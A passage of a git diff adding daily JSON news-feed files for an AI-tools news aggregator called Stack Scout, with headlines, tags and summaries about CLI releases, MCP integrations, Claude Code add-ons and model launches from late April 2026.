V4-Pro at $1.74/$3.48,", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-28.json b/data/news-feed-2026-04-28.json new file mode 100644 index 0000000..bb29a10 --- /dev/null +++ b/data/news-feed-2026-04-28.json @@ -0,0 +1,269 @@ +{ + "generated": "2026-06-05T00:44:36.618Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-28", + "article_count": 15, + "archived_story_count": 683, + "articles": [ + { + "title": "Hermes Agent v0.11.0 — 700 Pull Requests from 200 Contributors", + "url": "https://x.com/NousResearch/status/2047518675163636112", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "developer_tool", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-28T04:29:26.993Z", + "summary": "Hermes Agent v0.11.0 launched with 700+ pull requests from 200+ contributors, demonstrating the scale of open source AI agent development. 
The release is the largest update to the framework to date.", + "category": "ai_tools" + }, + { + "title": "Qwen Code sdk-typescript-v0.1.7 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/sdk-typescript-v0.1.7", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "api_update", + "github_release", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "github_release", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-28T06:16:45.000Z", + "summary": "## Bundled CLI Version\n\nThis SDK release bundles CLI version: 0.15.3\n\nSource: latest stable CLI from npm\n\n---\n\n## Bundled CLI Version\n\nThis SDK release bundles CLI version: 0.13.1\n\nSource: latest stable CLI from npm\n\n---\n\n> Backfilled release for npm-published version 0.1.5 (original workflow failed before GitHub release creation).\r\n\r\n## What's Changed\r\n* chore: bump version to 0.8.2 by @Mingholy in https://github.com/QwenLM/qwen-code/pull/1632\r\n* chore(release): sdk-typescript v0.1.4 by @qwen-c", + "category": "ai_tools" + }, + { + "title": "Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring…", + "url": "https://x.com/CrowdStrike/status/2049179351837512138", + "source": "X / @crowdstrike", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-28T17:30:04.000Z", + "summary": "Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring. 
Track administrative changes, tool", + "category": "ai_tools" + }, + { + "title": "Gemini Launches Agentic Trading on a Regulated US Exchange", + "url": "https://x.com/xHub_AI/status/2049131460460745232", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-28T17:27:14.508Z", + "summary": "Braygent wants to post about Gemini's Agentic Trading as the first regulated US exchange to enable AI model integration for live trading, arguing it changes what AI agents are allowed to do in the real world.", + "category": "ai_tools" + }, + { + "title": "NVIDIA Ships One Model That Replaces Vision Speech and Text Chain", + "url": "https://x.com/benitoz/status/2049168050495053924", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-28T17:27:14.508Z", + "summary": "Braygent wants to post about NVIDIA Nemotron 3 Nano Omni as a genuinely important release that unifies vision, speech, and text in one model, enabling 9x more agents per GPU with open weights.", + "category": "ai_tools" + }, + { + "title": "Warp Terminal Goes Open Source", + "url": "https://x.com/zeddotdev/status/2049167033275728343", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-28T17:27:14.507Z", + "summary": "Braygent wants to post about Warp going open source, arguing it signals the maturation of the AI developer tools market and the continued victory of open source in AI infrastructure.", + "category": "ai_tools" + }, + { + "title": "NEWS: AWS and OpenAI officially announce their partnership. 
Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI", + "url": "https://x.com/ainews_24_7/status/2049178579510956193", + "source": "X / @ainews_24_7", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-28T17:26:59.000Z", + "summary": "NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI", + "category": "ai_tools" + }, + { + "title": "NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.", + "url": "https://x.com/earlyn_ai/status/2049176023724359681", + "source": "X / @earlyn_ai", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-28T17:16:50.000Z", + "summary": "NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.", + "category": "ai_tools" + }, + { + "title": "shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.", + "url": "https://x.com/DevLsx/status/2049019913465979131", + "source": "X / @devlsx", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-28T06:56:30.000Z", + "summary": "shipping claude-manager today. 
it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.", + "category": "ai_tools" + }, + { + "title": "I built a framework for running AI teammates in your Slack, operated entirely from inside Claude Code", + "url": "https://reddit.com/r/ClaudeAI/comments/1sxy6og/i_built_a_framework_for_running_ai_teammates_in/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-28T11:06:30.000Z", + "summary": "I run a small smart-home company called Ginnie (hence the name). There's always more work than hands. Investigations to run, dashboards to scan, follow-ups to chase. I wanted more hands. Real teammates, not chatbots, not function-calling demos.\n\nSo I built ginnie-agents and ran my own team on it for months. Open-sourcing it now.\n\nWhat it is: a framework for a team of autonomous AI agents in your Slack workspace. 
Each agent has:\n\n\\- Its own Slack identity, app, avatar, channel\n\n\\- Persistent thre", + "category": "ai_tools" + }, + { + "title": "Qwen Code v0.15.4 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.4", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.78, + "date": "2026-04-28T13:22:30.000Z", + "summary": "## What's Changed\n* feat: Adds Catalan language support by @jordimas in https://github.com/QwenLM/qwen-code/pull/3643\n* fix(vscode-companion): slash command completion not triggering after message submit by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3609\n* fix(cli): guard gradient rendering without colors by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3640\n* fix(config): support QWEN_CODE_API_TIMEOUT_MS across OAuth and non-OAuth paths by @B-A-M-N in https://github.com/Q", + "category": "ai_tools" + }, + { + "title": "Open source package with 1 million monthly downloads stole user credentials", + "url": "https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/", + "source": "Ars Technica AI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.74, + "date": "2026-04-28T06:01:02.337Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Your Claude Code project dashboard is now on the Mac App Store", + "url": "https://reddit.com/r/ClaudeAI/comments/1syfl97/your_claude_code_project_dashboard_is_now_on_the/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-04-28T21:56:14.000Z", + "summary": "Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. 
\n\n\nApp Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691)\n\n\n\nQuick recap if you missed the original. \nStorybloq is a project tracker that lives in `.story/` inside your repo. \n \nTickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server ex", + "category": "ai_tools" + }, + { + "title": "ComfyUI Raises $30M at $500M Valuation", + "url": "https://x.com/robertnishihara/status/2047772168147374085", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-28T17:27:14.508Z", + "summary": "Braygent wants to post about ComfyUI's $30M raise at $500M valuation as a signal about the business model for open source AI tools with large developer communities.", + "category": "ai_tools" + }, + { + "title": "Scoble on One AI Doing Everything: The Everything App Is Coming", + "url": "https://x.com/Scobleizer/status/2048690528653660399", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-28T17:27:13.257Z", + "summary": "Robert posted that one AI will do everything and the OS itself should be rebuilt by AI for AI to use, with the everything app coming as a result. 
The vision is more radical than most industry commentary about AI integration.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-29.json b/data/news-feed-2026-04-29.json new file mode 100644 index 0000000..55e369f --- /dev/null +++ b/data/news-feed-2026-04-29.json @@ -0,0 +1,265 @@ +{ + "generated": "2026-06-05T00:44:36.824Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-29", + "article_count": 15, + "archived_story_count": 700, + "articles": [ + { + "title": "Vercel CLI @vercel/python-workers@0.0.19 released", + "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.19", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-04-29T20:39:18.000Z", + "summary": "### Patch Changes\n\n- b357f9d: Align queue deployment pinning with the TypeScript SDK by distinguishing automatic pinning, explicit deployment IDs, and explicit unpinned sends.\n- fddd88c: [vercel-workers] payload type validation\n- fb68ac6: Add explicit Python queue worker retry and acknowledgement directives. 
Workers can now return or raise `RetryAfter` and `Ack` to control retry and acknowledgement behavior.\n", + "category": "ai_tools" + }, + { + "title": "Converting Claude Code into the most intelligent Deep Research Agent", + "url": "https://reddit.com/r/ClaudeAI/comments/1sz9ib0/converting_claude_code_into_the_most_intelligent/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-29T19:47:38.000Z", + "summary": "Over the past several weeks, I've been working on HyperResearch, a Claude Code skill harness that converts CC into the most intelligent deep research framework out there.\n\nHyperResearch surpasses OpenAI, Google, and NVIDIA's offerings in the agentic search space based on DeepResearch Bench. It's open-source, installable with a single command, and uses your CC subscription, so you don't have to pay for OpenAI or Gemini Pro.\n\nIt uses a 16-step pipeline that creates a searchable, persistent knowled", + "category": "ai_tools" + }, + { + "title": "Higgsfield MCP Is Now Inside OpenClaw, Hermes Agent, and NemoClaw", + "url": "https://x.com/Maginative/status/2049200033665569020", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-04-29T14:44:20.783Z", + "summary": "Higgsfield MCP launched inside OpenClaw, Hermes Agent, and NemoClaw, enabling end-to-end content creation including video generation within a single agent session.", + "category": "ai_tools" + }, + { + "title": "AAIF Announces AGNTCon and MCPCon EU and NA for 2026", + "url": "https://x.com/AgenticAIFdn/status/2039696612633571565", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "product_launch" + ], + "matching_tags": [ + "mcp", + "product_launch" + ], + "importance": 1, + "date": "2026-04-29T14:41:24.682Z", + "summary": "The Agentic AI 
Foundation announced its 2026 events lineup including AGNTCon and MCPCon in EU and NA, plus global MCP Dev Summits for agentic AI builders.", + "category": "ai_tools" + }, + { + "title": "Poolside AI Just Released Its First Public Models: Open Source and API", + "url": "https://x.com/marah_i_abdin/status/2049161468017287490", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-29T01:48:00.432Z", + "summary": "Braygent's take: Poolside's first public models are a significant stealth-to-public moment. The open-source Laguna XS.2 gives the community access to a serious coding-focused MoE model.", + "category": "ai_tools" + }, + { + "title": "Qwen Code v0.15.5 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.5", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-29T09:54:18.000Z", + "summary": "## What's Changed\n* mcp config as cli by @eliird in https://github.com/QwenLM/qwen-code/pull/1279\n* fix(cli): refresh static header on model switch by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3667\n* feat(core): wire background shells into the task_stop tool by @wenshao in https://github.com/QwenLM/qwen-code/pull/3687\n* feat(skills): add tmux-real-user-testing skill for readable TUI test logs by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3577\n* feat(cli): wire backgrou", + "category": "ai_tools" + }, + { + "title": "The final nail in the coffin for entry level creative freelancers just dropped", + "url": "https://reddit.com/r/ClaudeAI/comments/1syu949/the_final_nail_in_the_coffin_for_entry_level/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.94, + "date": 
"2026-04-29T09:55:19.000Z", + "summary": "Anthropic just officially released the blender mcp connector today alongside adobe ,splice and sketchup, you can now type \"create a low poly beach scene with palm trees and sunset lighting\" into claude and watch it build the entire thing in blender in real time tadaaa. They even became an official blender development fund patron\n\nThis is claude directly controlling blender through the python api which means it can modify existing scenes, debug your node setups, batch apply changes across objects", + "category": "ai_tools" + }, + { + "title": "Launched My First App Using Claude", + "url": "https://reddit.com/r/ClaudeAI/comments/1sz38u6/launched_my_first_app_using_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-29T16:07:47.000Z", + "summary": "Hello everyone. About a week ago, I was able to launch my very own app, all of it being built by Claude.\n\nIt’s a vehicle management app. Allows you to keep track of how much you’re spending on your car(s), comes with a built in maintenance schedule that’s customizable, fuel tracking system, a showroom mode for people who would like to showcase their vehicles, and an AI assistant (Claude API).\n\nIt’s all front end, and everything is stored locally on the users device. The API calls do require a da", + "category": "ai_tools" + }, + { + "title": "Claude Design is amazing but I keep hitting rate limits. 
Tested an open source skill that runs on your normal subscription limits — here's both outputs for you to judge.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sz1rca/claude_design_is_amazing_but_i_keep_hitting_rate/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 0.78, + "date": "2026-04-29T15:15:33.000Z", + "summary": "Claude design is genuinely great for building HTML layouts and presentations. the problem is it burns through your usage fast — i was hitting limits after a few iterations.\n\nFound an open source claude code skill called huashu-design that does the same kind of thing (HTML prototypes, slide decks, animations) but runs through your normal claude code subscription. no separate rate limit.\n\n\n\nWanted to see how they actually compare, so i gave both the exact same prompt. one shot each, no follow-up e", + "category": "ai_tools" + }, + { + "title": "Fully 3D-modeled Raspberry Pi 5 enclosure made 100% through Claude's Blender MCP, zero manual modeling", + "url": "https://reddit.com/r/ClaudeAI/comments/1sz748q/fully_3dmodeled_raspberry_pi_5_enclosure_made_100/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-29T18:23:09.000Z", + "summary": "So I've been experimenting with Claude's new Blender MCP integration and decided to push it to its limits with a real engineering project: a complete, print-ready enclosure for the Raspberry Pi 5, modeled entirely through AI prompts, no hands on keyboard in Blender at all.\n\n**What Claude did autonomously:**\n\n* Researched and confirmed the official Raspberry Pi 5 mechanical dimensions from the datasheet (85×56mm PCB, exact mounting hole positions at 3.5/61.5 × 3.5/52.5mm)\n* Mapped every port and ", + "category": "ai_tools" + }, + { + "title": "Pattern I'm using to keep Claude Code 
productive on overnight unattended runs", + "url": "https://reddit.com/r/ClaudeAI/comments/1syr2pt/pattern_im_using_to_keep_claude_code_productive/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.7, + "date": "2026-04-29T06:51:16.000Z", + "summary": "Been running Claude Code on multi-hour autonomous sessions for a few months and kept hitting the same wall: the longer it runs, the worse the work gets. Not a context-window problem (1M handles that fine), but a feedback-loop problem. Iteration N+10 makes the same mistakes it made at iteration N, because nothing updates between iterations except the code.\n\nBuilt a small framework around three pieces that, between them, solved it for me. Together this framework as enabled me to consistently run v", + "category": "ai_tools" + }, + { + "title": "Your Claude Code project dashboard is now on the Mac App Store", + "url": "https://reddit.com/r/ClaudeAI/comments/1symv0c/your_claude_code_project_dashboard_is_now_on_the/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.7, + "date": "2026-04-29T03:13:42.000Z", + "summary": "Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free.\n\nApp Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691)\n\nQuick recap if you missed the original. \nStorybloq is a project tracker that lives in `.story/` inside your repo.\n\nTickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. 
The CLI and MCP server expose it to ", + "category": "ai_tools" + }, + { + "title": "LosslessCut v3.68.0 released", + "url": "https://github.com/mifi/lossless-cut/releases/tag/v3.68.0", + "source": "GitHub Releases · LosslessCut", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.7, + "date": "2026-01-29T16:54:17.000Z", + "summary": "⚠️ **Warning:** The keyboard handling has changed as of v3.67.0 and later. If you after upgrading to this version ever revert to a version prior to v3.67.0, you **will lose your keyboard bindings**. Also there's an issue with migrating certain shortcuts with some keyboard layouts to the new version. See [TLDR here.](https://github.com/mifi/lossless-cut/issues/2671#issuecomment-3727638311)\r\n\r\nNote: there's a bug with the [app size of this version being larger](https://github.com/mifi/lossless-cut", + "category": "ai_tools" + }, + { + "title": "I built a Kanban board for Claude Code so I can run agent sessions straight from cards", + "url": "https://reddit.com/r/ClaudeAI/comments/1sye8bs/i_built_a_kanban_board_for_claude_code_so_i_can/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.54, + "date": "2026-04-28T21:04:05.000Z", + "summary": "I've been running 4-5 Claude Code sessions in parallel and kept losing track - which terminal had the auth work, which one was the bug fix, what's actually done.\n\nSo I added a Kanban board to **Vibeyard** (an open-source IDE I'm building for Claude Code). \n\nEach card is a task. Click run → it spins up a Claude session scoped to that task. 
When Claude finishes, the card moves itself to Done.\n\nIt turned Claude from \"a terminal I talk to\" into ", + "category": "ai_tools" + }, + { + "title": "Are we underweighting execution benchmarks when we talk about open-source frontier models?", + "url": "https://reddit.com/r/StableDiffusion/comments/1szb07b/are_we_underweighting_execution_benchmarks_when/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-29T20:41:38.000Z", + "summary": "A lot of open-source model discussion still centers on broad IQ-style evals or raw one-turn quality. What feels underdiscussed to me is whether execution-heavy evaluation is becoming its own frontier.\n\n\n\nLing-2.6-1T being open-sourced on Hugging Face today is one reason I’m thinking about this. Its stated profile is unusually explicit: precise instruct execution, strong results on execution-heavy / agentic tasks, low token overhead, and long-context task handling.\n\n\n\nIf more frontier open models", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-30.json b/data/news-feed-2026-04-30.json new file mode 100644 index 0000000..b7d0e4d --- /dev/null +++ b/data/news-feed-2026-04-30.json @@ -0,0 +1,255 @@ +{ + "generated": "2026-06-05T00:44:36.990Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-30", + "article_count": 15, + "archived_story_count": 692, + "articles": [ + { + "title": "[Open Source] We built a local code search MCP for Claude Code that uses ~98% fewer tokens than grep+read", + "url": "https://reddit.com/r/ClaudeAI/comments/1szvo7t/open_source_we_built_a_local_code_search_mcp_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-30T13:11:07.000Z", + "summary": "Working 
on large codebases with Claude Code, we kept running into the same issue: when Claude looks for relevant code, it falls back to grep, reading full files, or launching multiple subagents. This burns through tokens, and often misses the relevant code. There are some existing solutions (that we also benchmarked against), but they all had issues (too slow, needs API keys, quality not good enough, etc).\n\nWe built [Semble](https://github.com/MinishLab/semble) to fix this. It's a local MCP serv", + "category": "ai_tools" + }, + { + "title": "The \"Big Tech Steamroller\" is coming for your AI agent. Before you write another line of code, ask yourself: \"Can a trillion-dollar company do this with a single API update?\" If the answer is yes, pivot now.", + "url": "https://x.com/AI_BioPhD/status/2049769860897321027", + "source": "X / @ai_biophd", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-30T08:36:32.000Z", + "summary": "The \"Big Tech Steamroller\" is coming for your AI agent. Before you write another line of code, ask yourself: \"Can a trillion-dollar company do this with a single API update?\" If the answer is yes, pivot now.", + "category": "ai_tools" + }, + { + "title": "Cursor SDK — The Democratization of Agent Development", + "url": "https://x.com/Marktechpost/status/2049711306643759265", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-30T05:23:49.823Z", + "summary": "Cursor's SDK reduces agent deployment to three lines of TypeScript, democratizing agent development. The release is the AWS moment for agents, dramatically lowering the barrier to production deployment.", + "category": "ai_tools" + }, + { + "title": "Codex CLI 0.128.0 is out! 
Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:", + "url": "https://x.com/Codex_Changelog/status/2049905403262079480", + "source": "X / @codex_changelog", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.97, + "date": "2026-04-30T17:35:08.000Z", + "summary": "Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:", + "category": "ai_tools" + }, + { + "title": "Show HN: Pu.sh – a full coding-agent harness in 400 lines of shell", + "url": "https://pu.dev/", + "source": "Hacker News", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 0.88, + "date": "2026-04-30T20:55:12.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "26 years ago I took a website management company public on NASDAQ (200+ staff, 60 engineers). Over just a few weekends I rebuilt a better product using Claude Code.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t00h8u/26_years_ago_i_took_a_website_management_company/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.8600000000000001, + "date": "2026-04-30T15:59:02.000Z", + "summary": "Yeah, me again, same guy from [the Legends of Future Past post](https://www.reddit.com/r/ClaudeAI/comments/1sfsz67/i_gave_claude_my_dead_games_30yearold_files_and/) a few weeks back (where I resurrected a 30+ year old game I lost the source to from its script files, using Claude Code). A bunch of folks asked what else I was working on. This is it.\n\nLightCMS is now open source: [https://github.com/jonradoff/lightcms](https://github.com/jonradoff/lightcms) (MIT). 
About 47K lines of Go, 114 MCP too", + "category": "ai_tools" + }, + { + "title": "pnpm v11.0.3 released", + "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.3", + "source": "GitHub Releases · pnpm", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-04-30T21:17:05.000Z", + "summary": "## Patch Changes\r\n\r\n* Fix too many open files error sometimes happening on Windows, when creating command shims in `node_modules/.bin` [#11412](https://github.com/pnpm/pnpm/issues/11412).\r\n* Fix `ERR_PNPM_FETCH_404` when installing a project whose lockfile depends on a `file:` tarball. The previous behavior dropped the `tarball` field from `file:` and git-hosted resolutions when `lockfile-include-tarball-url=false` (the default), even though those URLs cannot be reconstructed from the package na", + "category": "ai_tools" + }, + { + "title": "Vercel CLI @vercel/python-workers@0.0.20 released", + "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.20", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.76, + "date": "2026-04-30T03:51:45.000Z", + "summary": "### Patch Changes\n\n- 894e7d4: [python/vercel-workers] refactor framework-specific logic into vercel-workers\n", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.40.1 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.40.1", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-30T18:16:48.000Z", + "summary": "## What's Changed\n* fix(patch): cherry-pick 2194da2 to release/v0.40.0-pr-26153 to patch version v0.40.0 and create version 0.40.1 by @gemini-cli-robot in 
https://github.com/google-gemini/gemini-cli/pull/26268\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.40.0...v0.40.1", + "category": "ai_tools" + }, + { + "title": "X announces a rebuilt ad platform powered by AI", + "url": "https://techcrunch.com/2026/04/30/x-announces-a-rebuilt-ad-platform-powered-by-ai/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-30T18:04:35.970Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Stripe introduces Link, a digital wallet that autonomous AI agents can use, too", + "url": "https://techcrunch.com/2026/04/30/stripe-link-digital-wallet-ai-agents-shopping/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-30T18:04:35.962Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "The MCP Era Feels Like Déjà Vu 1 day ago • 3", + "url": "https://huggingface.co/blog/Navid-AI/mcp-era-feels-like-deja-vu", + "source": "Hugging Face Blog", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-30T18:04:33.505Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tut…", + "url": "https://x.com/ClaudeDigest/status/2049902211292127462", + "source": "X / @claudedigest", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-30T17:22:27.000Z", + "summary": "Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. 
That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tutorials/mdx/ mastering-claude-code …", + "category": "ai_tools" + }, + { + "title": "81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.", + "url": "https://x.com/polsia/status/2049901864381288455", + "source": "X / @polsia", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-30T17:21:04.000Z", + "summary": "81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.", + "category": "ai_tools" + }, + { + "title": "MiMo-V2.5-Pro Matches Opus 4.6 at 8x Lower Cost — Open Weights", + "url": "https://x.com/itsPaulAi/status/2049862276832715177", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-30T15:20:23.436Z", + "summary": "Braygent's take: MiMo-V2.5-Pro at 8x lower cost than Opus 4.6 is the open vs closed model story of 2026. 
